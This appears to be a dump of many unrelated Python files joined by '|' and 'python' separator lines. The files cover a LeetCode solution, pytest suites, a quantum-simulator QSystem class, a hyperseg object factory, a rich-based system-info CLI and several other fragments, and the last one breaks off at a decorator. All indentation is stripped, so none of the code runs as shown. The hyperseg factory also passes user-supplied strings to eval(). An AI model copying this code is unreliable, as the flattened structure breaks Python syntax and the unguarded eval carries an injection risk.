def get(cls, name):
if name not in cls.registry:
raise Exception(f'the "{name}" endpoint does not exist in the registry')
return cls.registry[name]
@classmethod
def register(cls, server):
endpoint = server._endpoint
logging.debug(f'registering endpoint: {endpoint}')
cls.registry[endpoint.name] = endpoint
return server
|
python
|
"""Plugin for emitting ast."""
__all__ = [
"DebugAstOptions",
"DebugAstEmitter",
"debug_ast",
]
from dataclasses import dataclass
from beet import Context, configurable
from beet.core.utils import required_field
from pydantic import BaseModel
from mecha import AstRoot, CompilationDatabase, Mecha, Visitor, rule
class DebugAstOptions(BaseModel):
location: bool = False
def beet_default(ctx: Context):
ctx.require(debug_ast)
@configurable(validator=DebugAstOptions)
def debug_ast(ctx: Context, opts: DebugAstOptions):
mc = ctx.inject(Mecha)
mc.steps[:] = [DebugAstEmitter(location=opts.location, database=mc.database)]
@dataclass
class DebugAstEmitter(Visitor):
"""Visitor that interrupts the compilation process and dumps the current ast."""
location: bool = False
database: CompilationDatabase = required_field()
@rule(AstRoot)
def debug_ast(self, node: AstRoot):
exclude = None if self.location else {"location", "end_location"}
self.database.current.text = node.dump(exclude=exclude) + "\n"
return None
|
python
|
#!/usr/bin/env python
"""
CREATED AT: 2021/9/14
Des:
https://leetcode.com/problems/reverse-only-letters
https://leetcode.com/explore/item/3974
GITHUB: https://github.com/Jiezhi/myleetcode
Difficulty: Easy
"""
from tool import print_results
class Solution:
@print_results
def reverseOnlyLetters(self, s: str) -> str:
"""
115 / 115 test cases passed.
Status: Accepted
Runtime: 73 ms
Memory Usage: 14.1 MB
:param s:
:return:
"""
s = list(s)
i, j = 0, len(s) - 1
while i < j:
while not s[i].isalpha() and i < j:
i += 1
while not s[j].isalpha() and i < j:
j -= 1
if i < j:
s[i], s[j] = s[j], s[i]
i += 1
j -= 1
return ''.join(s)
def test():
assert Solution().reverseOnlyLetters(s="ab-cd") == "dc-ba"
assert Solution().reverseOnlyLetters(s="a-bC-dEf-ghIj") == "j-Ih-gfE-dCba"
assert Solution().reverseOnlyLetters(s="Test1ng-Leet=code-Q!") == "Qedo1ct-eeLg=ntse-T!"
if __name__ == '__main__':
test()
|
python
|
import pytest
# Local Functions
from fexception.util import set_caller_override
# Local Methods
from fexception.util import KeyCheck
__author__ = 'IncognitoCoding'
__copyright__ = 'Copyright 2022, test_util'
__credits__ = ['IncognitoCoding']
__license__ = 'MIT'
__version__ = '0.0.2'
__maintainer__ = 'IncognitoCoding'
__status__ = 'Beta'
# ############################################################
# ######Section Test Part 1 (Successful Value Checking)#######
# ############################################################
def test_1_set_caller_override():
"""
Tests an setting a caller_override with the module name.
"""
caller_override = set_caller_override(tb_remove_name='test_1_set_caller_override')
assert 'python' == str(caller_override.get('module'))
assert 'pytest_pyfunc_call' == str(caller_override.get('name'))
# This line number can change if pytest updates code.
assert 183 == int(caller_override.get('line'))
assert 'test_1_set_caller_override' == str(caller_override.get('tb_remove'))
def test_1_keycheck() -> None:
"""
Tests key check success.
"""
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['key1', 'key3'])
def test_1_2_keycheck() -> None:
"""
Tests key check success.
"""
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['key1'])
def test_1_3_keycheck() -> None:
"""
Tests key check success in reverse.
"""
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['key1', 'key3'])
def test_1_4_keycheck() -> None:
"""
Tests key check success in reverse.
"""
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['key1'], reverse_output=True)
# ############################################################
# ######Section Test Part 2 (Error/Catch Value Checking)######
# ############################################################
def test_2_set_caller_override():
"""
Tests a non-matching tb_remove name.
"""
with pytest.raises(Exception) as excinfo:
set_caller_override(tb_remove_name='invalid_name')
assert ('The function or method name did not match any co_name '
'in the inspect.currentframe()') in str(excinfo.value)
assert """'invalid_name' matching co_name""" in str(excinfo.value)
def test_2_keycheck():
"""
Tests missing key input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Red': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['Yellow', 'Blue'])
assert 'The input keys have inconsistent value and requirement keys.' in str(excinfo.value)
def test_2_1_keycheck():
"""
Tests duplicate key input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Green': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['Yellow', 'Blue', 'Blue'])
assert 'The required key list contains duplicate keys. All keys must be unique.' in str(excinfo.value)
def test_2_2_keycheck():
"""
Tests incorrect type input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Green': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys={'Bad Type'})
assert """The dictionary key ('{'Bad Type'}') does not match any expected match option key(s).""" in str(excinfo.value)
assert """Match Option Key(s) = {'Bad Type'}""" in str(excinfo.value)
assert """Failed Key(s) = ['Green', 'Blue']""" in str(excinfo.value)
def test_2_3_reverse_keycheck():
"""
Tests duplicate key input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Red': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['Yellow', 'Blue', 'Blue'], reverse_output=True)
assert 'The required key list contains duplicate keys. All keys must be unique.' in str(excinfo.value)
def test_2_4_reverse_keycheck():
"""
Tests duplicate key input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Red': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=[], reverse_output=True)
assert 'No key(s) were sent' in str(excinfo.value)
assert """Expected Key(s) = ['Green', 'Blue', 'Red']""" in str(excinfo.value)
def test_2_5_reverse_keycheck():
"""
Tests duplicate key input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Red': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys='Red', reverse_output=True)
assert 'The input keys have inconsistent value and requirement keys.' in str(excinfo.value)
assert """Required Key(s) = ['Green', 'Blue', 'Red']""" in str(excinfo.value)
def test_2_6_keycheck() -> None:
"""
Tests key check validation failure.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['key1', 'key2'])
assert """The dictionary key ('key2') does not exist in the expected required key(s).""" in str(excinfo.value)
assert """Expected Key(s) = ['key1', 'key2']""" in str(excinfo.value)
assert """Failed Key(s) = ['key1', 'key3']""" in str(excinfo.value)
def test_2_7_keycheck() -> None:
"""
Tests key check validation failure.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'key2': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['key5'])
assert """Match Option Key(s) = ['key5']""" in str(excinfo.value)
def test_2_8_keycheck():
"""
Tests key check validation failure.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['key1', 'key2'])
assert """Expected Key(s) = ['key1', 'key2']""" in str(excinfo.value)
def test_2_9_reverse_keycheck():
"""
Tests reverse key check validation failure.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['key1', 'key2'], reverse_output=True)
assert """Expected Key(s) = ['key1', 'key3']""" in str(excinfo.value)
def test_2_10_reverse_keycheck():
"""
Tests reverse key check validation failure.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Green': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['Yellow', 'Blue'], reverse_output=True)
assert """Match Option Key(s) = ['Green', 'Blue']""" in str(excinfo.value)
|
python
|
from math import sqrt
class SomeClass:
'''Some class that certainly does things.
Args:
foo (str): Some string.
'''
def __init__(self, foo: str = 'foo'):
self.msg = f'Here comes {foo}!'
def is_msg_large(self, msg: str):
msg_size = len(msg)
is_large = msg_size > 256
if is_large:
print('This message is too large!')
return is_large
bar = SomeClass('foo')
largeness = bar.is_msg_large(bar.msg)
|
python
|
from fractions import Fraction
def roll(dices, times):
counter = {}
for d in dices:
counter[d] = 1
for t in range(1, times):
acc = {}
for k, v in counter.items():
for d in dices:
acc[k + d] = acc.get(k + d, 0) + v
counter = acc
return counter
pyramidal = roll([1, 2, 3, 4], 9)
cubic = roll([1, 2, 3, 4, 5, 6], 6)
pyramidal_pr = {}
for k, v in pyramidal.items():
pyramidal_pr[k] = Fraction(v, 4 ** 9)
cubic_pr = {}
for k, v in cubic.items():
cubic_pr[k] = Fraction(v, 6 ** 6)
beats_pr = 0
for p, p_pr in pyramidal_pr.items():
for c, c_pr in cubic_pr.items():
if p > c:
beats_pr += p_pr * c_pr
print("%.7f" % float(beats_pr))
|
python
|
__author__ = 'faisal'
|
python
|
import os
import importlib
from functools import partial
KNOWN_MODULES = {
# datasets
'opencv_video_seq_dataset': 'hyperseg.datasets.opencv_video_seq_dataset',
'img_landmarks_transforms': 'hyperseg.datasets.img_landmarks_transforms',
'seg_transforms': 'hyperseg.datasets.seg_transforms',
'transforms': 'torchvision.transforms',
# models
'models': 'hyperseg.models',
'mobilenet': 'hyperseg.models.mobilenet',
'efficientnet': 'hyperseg.models.efficientnet',
'efficientnet_custom': 'hyperseg.models.efficientnet_custom',
'efficientnet_custom_03': 'hyperseg.models.efficientnet_custom_03',
# Layers
'weight_mapper': 'hyperseg.models.layers.weight_mapper',
'weight_mapper_unet': 'hyperseg.models.layers.weight_mapper_unet',
# Torch
'nn': 'torch.nn',
'optim': 'torch.optim',
'lr_scheduler': 'torch.optim.lr_scheduler',
}
def extract_args(*args, **kwargs):
return args, kwargs
def is_str_module(obj_exp):
return isinstance(obj_exp, str) and '.' in obj_exp or ('(' in obj_exp and ')' in obj_exp)
def obj_factory(obj_exp, *args, **kwargs):
""" Creates objects from strings or partial objects with additional provided arguments.
In case a sequence is provided, all objects in the sequence will be created recursively.
Objects that are not strings or partials be returned as they are.
Args:
obj_exp (str or partial): The object string expresion or partial to be converted into an object. Can also be
a sequence of object expressions
*args: Additional arguments to pass to the object
**kwargs: Additional keyword arguments to pass to the object
Returns:
object or object list: Created object or list of recursively created objects
"""
if isinstance(obj_exp, (list, tuple)):
return [obj_factory(o, *args, **kwargs) for o in obj_exp]
if isinstance(obj_exp, partial):
return obj_exp(*args, **kwargs)
if not isinstance(obj_exp, str):
return obj_exp
# Handle arguments
if '(' in obj_exp and ')' in obj_exp:
args_exp = obj_exp[obj_exp.find('('):]
obj_args, obj_kwargs = eval('extract_args' + args_exp)
# # Recursively evaluate string modules
# obj_args = tuple([obj_factory(o) if is_str_module(o) else o for o in obj_args])
# obj_kwargs = {k: obj_factory(v) if is_str_module(v) else v for k, v in obj_kwargs.items()}
# Concatenate arguments
args = obj_args + args
kwargs.update(obj_kwargs)
obj_exp = obj_exp[:obj_exp.find('(')]
# From here we can assume that dots in the remaining of the expression
# only separate between modules and classes
module_name, class_name = os.path.splitext(obj_exp)
class_name = class_name[1:]
module = importlib.import_module(KNOWN_MODULES[module_name] if module_name in KNOWN_MODULES else module_name)
module_class = getattr(module, class_name)
class_instance = module_class(*args, **kwargs)
return class_instance
def partial_obj_factory(obj_exp, *args, **kwargs):
""" Creates objects from strings or partial objects with additional provided arguments.
In case a sequence is provided, all objects in the sequence will be created recursively.
Objects that are not strings or partials be returned as they are.
Args:
obj_exp (str or partial): The object string expresion or partial to be converted into an object. Can also be
a sequence of object expressions
*args: Additional arguments to pass to the object
**kwargs: Additional keyword arguments to pass to the object
Returns:
object or object list: Created object or list of recursively created objects
"""
if isinstance(obj_exp, (list, tuple)):
return [partial_obj_factory(o, *args, **kwargs) for o in obj_exp]
if isinstance(obj_exp, partial):
return partial(obj_exp.func, *(obj_exp.args + args), **{**obj_exp.keywords, **kwargs})
if not isinstance(obj_exp, str):
return partial(obj_exp)
# Handle arguments
if '(' in obj_exp and ')' in obj_exp:
args_exp = obj_exp[obj_exp.find('('):]
obj_args, obj_kwargs = eval('extract_args' + args_exp)
# Concatenate arguments
args = obj_args + args
kwargs.update(obj_kwargs)
obj_exp = obj_exp[:obj_exp.find('(')]
# From here we can assume that dots in the remaining of the expression
# only separate between modules and classes
module_name, class_name = os.path.splitext(obj_exp)
class_name = class_name[1:]
module = importlib.import_module(KNOWN_MODULES[module_name] if module_name in KNOWN_MODULES else module_name)
module_class = getattr(module, class_name)
return partial(module_class, *args, **kwargs)
def main(obj_exp):
# obj = obj_factory(obj_exp)
# print(obj)
import inspect
partial_obj = partial_obj_factory(obj_exp)
print(f'is obj_exp a class = {inspect.isclass(partial_obj.func)}')
print(partial_obj)
if __name__ == "__main__":
# Parse program arguments
import argparse
parser = argparse.ArgumentParser('utils test')
parser.add_argument('obj_exp', help='object string')
args = parser.parse_args()
main(args.obj_exp)
|
python
|
"""Module that provides a data structure representing a quantum system.
Data Structures:
QSystem: Quantum System, preferred over QRegistry (can save a lot of space)
Functions:
superposition: join two registries into one by calculating tensor product.
"""
import numpy as np
from qsimov.structures.qstructure import QStructure, _get_qubit_set, \
_get_op_data
from qsimov.structures.qregistry import QRegistry, superposition
class QSystem(QStructure):
"""Quantum System, preferred over QRegistry (can save a lot of space)."""
def __init__(self, num_qubits, doki=None, verbose=False):
"""Initialize QSystem to state 0.
num_qubits -> number of QuBits in the system.
"""
if doki is None:
import doki
self.doki = doki
if num_qubits is None:
self.regs = None
self.qubitMap = None
self.usable = None
self.num_qubits = 0
else:
self.regs = [[QRegistry(1, doki=self.doki), [id]]
for id in range(num_qubits)]
self.qubitMap = {id: id for id in range(num_qubits)}
self.usable = [True for id in range(num_qubits)]
self.num_qubits = num_qubits
self.verbose = verbose
def free(self):
"""Release memory held by the QSystem."""
if self.regs is not None:
for reg, _ in self.regs:
if isinstance(reg, QRegistry):
reg.free()
del self.regs
del self.qubitMap
del self.usable
self.regs = None
self.qubitMap = None
self.usable = None
def clone(self):
"""Clone this QSystem."""
new_sys = QSystem(None, doki=self.doki)
new_sys.num_qubits = self.num_qubits
new_sys.usable = self.usable[:]
new_sys.qubitMap = {}
for id in self.qubitMap:
new_sys.qubitMap[id] = self.qubitMap[id]
new_sys.regs = [[self.regs[id][0].clone(), self.regs[id][1][:]]
if isinstance(self.regs[id][0], QRegistry)
else [self.regs[id][0], self.regs[id][1][:]]
for id in range(new_sys.num_qubits)]
return new_sys
def __del__(self):
"""Clean after deletion."""
self.free()
def prob(self, id, num_threads=-1):
"""Get the odds of getting 1 when measuring specified qubit."""
id = _get_qubit_set(self.get_num_qubits(), [id], True, "argument")[0]
reg, ids = self.regs[self.qubitMap[id]]
if not self.usable[id]:
return reg
new_id = None
for i in range(len(ids)):
if ids[i] == id:
new_id = i
break
if new_id is None:
raise RuntimeError("Couldn't find id in any reg, " +
"please report this bug.")
return reg.prob(new_id, num_threads=num_threads)
def get_sizes(self):
"""Return the number of elements of each registry in the system."""
return ((reg[0].get_state_size(), reg[1])
if type(reg[0]) == QRegistry
else (1, reg[1])
for reg in self.regs)
def get_state_size(self):
"""Return the number of elements in the state vector of the system."""
total = 0
for reg in self.regs:
if type(reg[0]) == QRegistry:
total += reg[0].get_state_size()
else:
total += 1
return total
def get_split_num_qubits(self):
"""Return the number of qubits in each registry of the system."""
return (reg[0].get_num_qubits()
if type(reg[0]) == QRegistry
else 1 # When we measure with remove=True
for reg in self.regs)
def get_num_qubits(self):
"""Return the number of qubits in this system."""
return self.num_qubits
def measure(self, ids, random_generator=np.random.rand, num_threads=-1):
"""Measure specified qubits of this system and collapse.
Positional arguments:
ids -> List of QuBit ids that have to be measured
Keyworded arguments:
random_generator -> function without arguments that returns
a random real number in [0, 1)
Return:
List with the value obtained after each measure
"""
num_qubits = self.get_num_qubits()
ids = _get_qubit_set(num_qubits, ids, False, "ids")
if ids is None:
raise ValueError("ids cannot be None")
split_ids = {reg_id: set() for reg_id in range(len(self.regs))}
for qubit_id in ids:
if not self.usable[qubit_id]:
raise ValueError(f"Id {qubit_id} has already been measured")
reg_id = self.qubitMap[qubit_id]
split_ids[reg_id].add(qubit_id)
# In split ids we have reg_id -> set of ids to measure in that reg
split_ids = {k: v for k, v in split_ids.items() if len(v) > 0}
result = [None for i in range(num_qubits)]
# Here we have the registries that have not been used
untouched_regs = {i for i in range(len(self.regs))
if i not in split_ids}
# We create a new QSystem with the regs that have not been used
new_sys = QSystem(None, doki=self.doki)
new_sys.regs = []
exception = None
try:
for reg_id in untouched_regs:
reggie, reg_ids = self.regs[reg_id]
if isinstance(reggie, QRegistry):
reggie = reggie.clone()
new_sys.regs.append((reggie,
reg_ids[:]))
new_sys.qubitMap = {}
for reg_id in range(len(untouched_regs)):
for qubit_id in new_sys.regs[reg_id][1]:
new_sys.qubitMap[qubit_id] = reg_id
# print("[DEBUG]", ids)
new_sys.usable = [i not in ids and self.usable[i]
for i in range(self.num_qubits)]
# print("[DEBUG]", new_sys.usable)
new_sys.num_qubits = self.num_qubits
# We iterate through the registries that have a qubit in ids
for reg_id in split_ids:
partial_ids = split_ids[reg_id] # ids of QSystem to measure
new_reg = None
partial_result = None
reg, reg_ids = self.regs[reg_id]
# Ids to measure in the QRegistry (not in the whole QSystem)
# mapped to the id in the QSystem
new_ids = {i: reg_ids[i] for i in range(len(reg_ids))
if reg_ids[i] in partial_ids}
# Not measured ids of the QSystem belonging to this QRegistry
not_ids = [reg_ids[i] for i in range(len(reg_ids))
if reg_ids[i] not in partial_ids]
# We measure registries
if isinstance(reg, QRegistry):
aux = reg.measure(new_ids.keys(),
random_generator=random_generator,
num_threads=num_threads)
new_reg, partial_result = aux
new_reg.num_bits = 0
new_reg.qubit_map = {i: i
for i in range(new_reg.num_qubits)}
new_reg.classic_vals = {}
elif isinstance(reg, bool):
new_reg = None
partial_result = [reg]
else:
raise RuntimeError(f"Unknown reg type: {type(reg)}." +
" Please report this bug.")
# We add the results to the result list
for local_id in new_ids:
result[new_ids[local_id]] = partial_result[local_id]
# We add the new registry (if it exists) to the list of regs
if new_reg is not None:
new_sys.regs.append([new_reg, not_ids])
# We update the mapping
for qubit_id in not_ids:
new_sys.qubitMap[qubit_id] = len(new_sys.regs) - 1
# We add booleans
for qubit_id in partial_ids:
new_sys.regs.append([result[qubit_id], [qubit_id]])
new_sys.qubitMap[qubit_id] = len(new_sys.regs) - 1
except Exception as ex:
exception = ex
if exception is not None:
new_sys.free()
raise exception
return (new_sys, result)
def as_qregistry(self, num_threads=-1, canonical=True):
"""Return this system as a QRegistry."""
aux_reg = None
new_reg = None
new_ids = []
first = True
exception = None
reg_ids = []
for i in range(self.num_qubits):
if self.usable[i]:
reg_id = self.qubitMap[i]
if reg_id not in reg_ids:
reg_ids.append(reg_id)
try:
for reg_id in reg_ids[::-1]:
reg, ids = self.regs[reg_id]
if type(reg) == QRegistry:
if new_reg is None:
new_reg = reg
else:
aux_reg = superposition(new_reg, reg,
num_threads=num_threads,
verbose=self.verbose)
new_ids = ids + new_ids
if aux_reg is not None:
if not first:
new_reg.free()
first = False
new_reg = aux_reg
aux_reg = None
# Here we remove the unused ids
# print("[DEBUG] PreSort:", new_reg.get_state())
# print("[DEBUG] IDs:", new_ids)
swap_ids = np.argsort(np.argsort(new_ids))
# print("[DEBUG] SWAP IDs:", swap_ids)
# And we sort the remaining qubits by qubit_id
for i in range(len(swap_ids)):
while swap_ids[i] != i:
swap_targets = [swap_ids[i], swap_ids[swap_ids[i]]]
# print("[DEBUG] Looping:", swap_targets)
swap_ids[swap_targets[0]], swap_ids[i] = swap_targets
aux_reg = new_reg.apply_gate("SWAP",
targets=[i, swap_targets[0]],
num_threads=num_threads)
if not first:
new_reg.free()
new_reg = aux_reg
# print("[DEBUG] Sorted:", new_reg.get_state())
except Exception as ex:
exception = ex
if exception is not None:
if new_reg is not None:
new_reg.free()
if aux_reg is not None:
aux_reg.free()
raise exception
return new_reg
def get_state(self, key=None, canonical=False):
return self.as_qregistry().get_state(key=key, canonical=canonical)
def get_classic(self, id):
"""Return classic bit value (if qubit has been measured)."""
if self.usable[id]:
return None
return self.regs[self.qubitMap[id]][0]
def apply_gate(self, gate, targets=None, controls=None, anticontrols=None,
num_threads=-1):
"""Apply specified gate to specified qubit with specified controls.
Positional arguments:
gate: string with the name of the gate to apply, or a QGate
Keyworded arguments:
targets: id of the least significant qubit the gate will target
controls: id or list of ids of the qubit that will act as
controls
anticontrols: id or list of ids of the qubit that will act as
anticontrols
num_threads: number of threads to use
optimize: only for QGates. Whether to use optimized lines or
user defined lines
"""
if not np.allclose(num_threads % 1, 0):
raise ValueError("num_threads must be an integer")
num_threads = int(num_threads)
num_qubits = self.get_num_qubits()
op_data = _get_op_data(num_qubits, gate, targets,
controls, anticontrols)
gate = op_data["gate"]
targets = op_data["targets"]
controls = op_data["controls"]
anticontrols = op_data["anticontrols"]
# We create a new system without the data of the parties
new_sys = QSystem(None, doki=self.doki)
new_sys.regs = []
new_reg = None
aux_reg = None
exception = None
try:
# If any of the affected qubits is marked as not usable
if any([not self.usable[qubit_id]
for qubit_id in targets]):
# we raise an exception
raise ValueError("Trying to apply gate to classic bit")
classic_controls = {qubit_id for qubit_id in controls
if not self.usable[qubit_id]}
classic_anticontrols = {qubit_id for qubit_id in anticontrols
if not self.usable[qubit_id]}
ccheck = all(self.regs[self.qubitMap[id]][0]
for id in classic_controls)
accheck = any(self.regs[self.qubitMap[id]][0]
for id in classic_anticontrols)
if ((len(classic_controls) > 0 and not ccheck)
or (len(classic_anticontrols) > 0 and not accheck)):
return self.clone()
controls -= classic_controls
anticontrols -= classic_anticontrols
# All affected qubits
parties = controls.union(anticontrols).union(targets)
touched_regs = {self.qubitMap[qubit_id]
for qubit_id in parties}
for reg_id in range(len(self.regs)):
if reg_id not in touched_regs:
reggie, reg_ideses = self.regs[reg_id]
if isinstance(reggie, QRegistry):
reggie = reggie.clone()
new_sys.regs.append([reggie, reg_ideses[:]])
# Create new qubit map
new_sys.qubitMap = {}
for reg_id in range(len(new_sys.regs)):
for qubit_id in new_sys.regs[reg_id][1]:
new_sys.qubitMap[qubit_id] = reg_id
new_sys.usable = self.usable[:]
new_sys.num_qubits = self.num_qubits
new_ids = []
merged = False
for reg_id in touched_regs:
curr_reg, curr_ids = self.regs[reg_id]
if new_reg is not None:
aux_reg = superposition(curr_reg, new_reg,
num_threads=num_threads,
verbose=self.verbose)
if merged:
new_reg.free()
del new_reg
else:
merged = True
new_reg = aux_reg
else:
new_reg = curr_reg
new_ids += curr_ids
inverse_map = {new_ids[qubit_id]: qubit_id
for qubit_id in range(len(new_ids))}
mapped_targets = [inverse_map[qubit_id]
for qubit_id in targets]
mapped_controls = {inverse_map[qubit_id]
for qubit_id in controls}
mapped_anticontrols = {inverse_map[qubit_id]
for qubit_id in anticontrols}
aux_reg = new_reg.apply_gate(gate, targets=mapped_targets,
controls=mapped_controls,
anticontrols=mapped_anticontrols,
num_threads=num_threads)
if merged:
new_reg.free()
new_reg = None
new_sys.regs.append([aux_reg, new_ids])
for id in new_ids:
new_sys.qubitMap[id] = len(new_sys.regs) - 1
except Exception as ex:
if new_sys is not None:
new_sys.free()
if new_reg is not None and merged:
new_reg.free()
if aux_reg is not None:
aux_reg.free()
new_sys = None
exception = ex
if exception is not None:
raise exception
return new_sys
def get_bloch_coords(self):
"""Get the polar coordinates of all ONE qubit registries."""
return [self.regs[self.qubitMap[id]][0].get_bloch_coords()
if (type(self.regs[self.qubitMap[id]][0]) == QRegistry
and len(self.regs[self.qubitMap[id]][1]) == 1)
else None
for id in range(self.num_qubits)]
def join_systems(most, least):
"""Return a system that contains both a and b systems."""
res = QSystem(None, doki=most.doki)
res.regs = []
res.qubitMap = {}
res.usable = set()
exception = None
try:
count = 0
for reg, ids in least.regs:
new_reg = reg
if reg == QRegistry:
new_reg = reg.clone()
res.usable.add(count)
count += 1
res.regs.append([new_reg, ids[:]])
offset = least.get_num_qubits()
for reg, ids in most.regs:
new_reg = reg
if reg == QRegistry:
new_reg = reg.clone()
res.usable.add(count)
count += 1
res.regs.append([new_reg, [id + offset for id in ids]])
for i in range(len(res.regs)):
_, ids = res.regs[i]
for qubit_id in ids:
res.qubitMap[qubit_id] = i
except Exception as ex:
exception = ex
if exception is not None:
res.free()
raise exception
return res
|
python
|
from panoramic.cli.husky.service.select_builder.graph_search import (
sort_models_with_heuristic,
)
from panoramic.cli.husky.service.utils.taxon_slug_expression import TaxonSlugExpression
from tests.panoramic.cli.husky.test.mocks.husky_model import (
get_mock_entity_model,
get_mock_metric_model,
)
from tests.panoramic.cli.husky.test.test_base import BaseTest
class TestGraphSearch(BaseTest):
def test_company_scoped_models(self):
entity_model = get_mock_entity_model()
company_model = get_mock_metric_model(company_id='company-id')
models = [entity_model, company_model]
sorted_models = sort_models_with_heuristic(
models, {TaxonSlugExpression('ad_id'), TaxonSlugExpression('impressions')}
)
self.assertEqual(2, len(sorted_models))
self.assertEqual([company_model, entity_model], sorted_models)
|
python
|
import unittest
import_error = False
try:
from ...tables.base import Base
except ImportError:
import_error = True
Base = None
class TestCase00(unittest.TestCase):
def test_import(self):
self.assertFalse(import_error)
class TestCase01(unittest.TestCase):
def setUp(self):
self.base = Base()
def test_init(self):
pass
|
python
|
"""Utility functions."""
import pycountry
def eu_country_code_to_iso3(eu_country_code):
"""Converts EU country code to ISO 3166 alpha 3.
The European Union uses its own country codes, which often but not always match ISO 3166.
"""
assert len(eu_country_code) == 2, "EU country codes are of length 2, yours is '{}'.".format(eu_country_code)
if eu_country_code.lower() == "el":
iso2 = "gr"
elif eu_country_code.lower() == "uk":
iso2 = "gb"
elif eu_country_code.lower() == "bh": # this is a weird country code used in the biofuels dataset
iso2 = "ba"
else:
iso2 = eu_country_code
return pycountry.countries.lookup(iso2).alpha_3
|
python
|
from info import *
from choice import *
from rich.console import Console
from rich.table import Table
import time
from rich import print
from rich.panel import Panel
from rich.progress import Progress
def banner():
print(r"""
_ ___ ____ ____ __ _ _
| | | \ \/ /\ \ / / \/ | __ _/ | / |
| |_| |\ / \ \ / /| |\/| | \ \ / / | | |
| _ |/ \ \ V / | | | | \ V /| |_| | - Check your host compatibility for VMs
|_| |_/_/\_\ \_/ |_| |_| \_/ |_(_)_|
""")
print(Panel("Copyright of Aman Srivastava, 2022\nhttps://amanonearth.github.io\nhttps://amanonearth.medium.com ", title="Welcome", subtitle="Thank you"))
def main():
homeopt = int(input("Please enter your option: "))
if homeopt == 1:
with Progress() as progress:
task01 = progress.add_task("[green]Gathering System Information...", total=100)
while not progress.finished:
progress.update(task01, advance=0.7)
time.sleep(0.02)
sysinfo()
if homeopt == 2:
with Progress() as progress:
task02 = progress.add_task("[green]Gathering CPU Information...", total=100)
while not progress.finished:
progress.update(task02, advance=0.9)
time.sleep(0.02)
cpuinfo()
if homeopt == 3:
with Progress() as progress:
task03 = progress.add_task("[green]Gathering RAM Information...", total=100)
while not progress.finished:
progress.update(task03, advance=0.6)
time.sleep(0.02)
raminfo()
if homeopt == 4:
with Progress() as progress:
task04 = progress.add_task("[green]Gathering Disk Information...", total=100)
while not progress.finished:
progress.update(task04, advance=0.5)
time.sleep(0.02)
diskinfo()
if homeopt == 5:
with Progress(transient=True) as progress:
task1 = progress.add_task("[green]Gathering System Information...", total=100)
task2 = progress.add_task("[green]Gathering CPU Information...", total=100)
task3 = progress.add_task("[green]Gathering RAM Information...", total=100)
task4 = progress.add_task("[green]Gathering Disk Information...", total=100)
while not progress.finished:
progress.update(task1, advance=0.7)
progress.update(task2, advance=0.9)
progress.update(task3, advance=0.6)
progress.update(task4, advance=0.5)
time.sleep(0.02)
allinfo()
if homeopt == 6:
choicepy()
if homeopt >= 7:
print(Panel.fit("[red]Your choosen option is not a valid input.\nPlease try again with valid input."))
if __name__ == "__main__":
banner()
print("\n")
table = Table()
table.add_column("S. No.")
table.add_column("Option", style="green")
table.add_row("1", "Get your System Information")
table.add_row("2", "Get CPU Information")
table.add_row("3", "Get RAM Information")
table.add_row("4", "GET Disk Information")
table.add_row("5", "Get All information mentioned above")
table.add_row("6", "Check Virtual Machine Compatibility")
console = Console()
console.print(table)
main()
|
python
|
import os
import sys
from copy import deepcopy
from distutils.version import LooseVersion
import h5py
import numpy as np
import pytest
from ...util.functions import random_id
from ...model import Model
from ...model.tests.test_helpers import get_realistic_test_dust
from .. import (CartesianGrid,
SphericalPolarGrid,
CylindricalPolarGrid,
AMRGrid,
OctreeGrid)
try:
import yt
except:
YT_VERSION = None
else:
if LooseVersion(yt.__version__) >= LooseVersion('3'):
YT_VERSION = 3
else:
YT_VERSION = 2
DATA = os.path.join(os.path.dirname(__file__), 'data')
ALL_GRID_TYPES = ['car', 'amr', 'oct']
@pytest.mark.skipif("YT_VERSION is None")
